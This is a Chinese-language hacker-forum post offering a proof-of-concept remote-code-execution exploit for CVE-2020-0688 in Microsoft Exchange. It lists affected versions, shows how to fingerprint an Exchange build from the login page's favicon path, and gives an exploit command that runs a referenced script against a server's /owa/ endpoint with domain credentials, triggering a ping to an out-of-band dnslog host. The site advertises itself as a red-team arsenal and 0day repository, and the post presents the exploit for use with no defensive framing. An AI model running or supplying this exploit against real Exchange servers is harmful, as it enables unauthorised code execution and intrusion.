黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Shacker

POC RCE-需要域用户(CVE-2020-0688)

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
Python:
## 漏洞概述

由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的

## 影响范围

```http
#需要域用户登陆
2010、2013、2016、2019
```

**对于如何识别版本可以用如下的方式**:

在登录界面查看网页源代码,15.1.225就是版本,之后在[Mircosoft网站](https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019)上根据版本号就可以直接查询

```html
找到<link rel="shortcut icon" href="/owa/auth/15.1.225/themes/resources/favicon.ico" type="image/x-icon">
```

## EXP

```bash
python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"
```

[@Ridter](https://github.com/Ridter/cve-2020-0688)
 
后退
顶部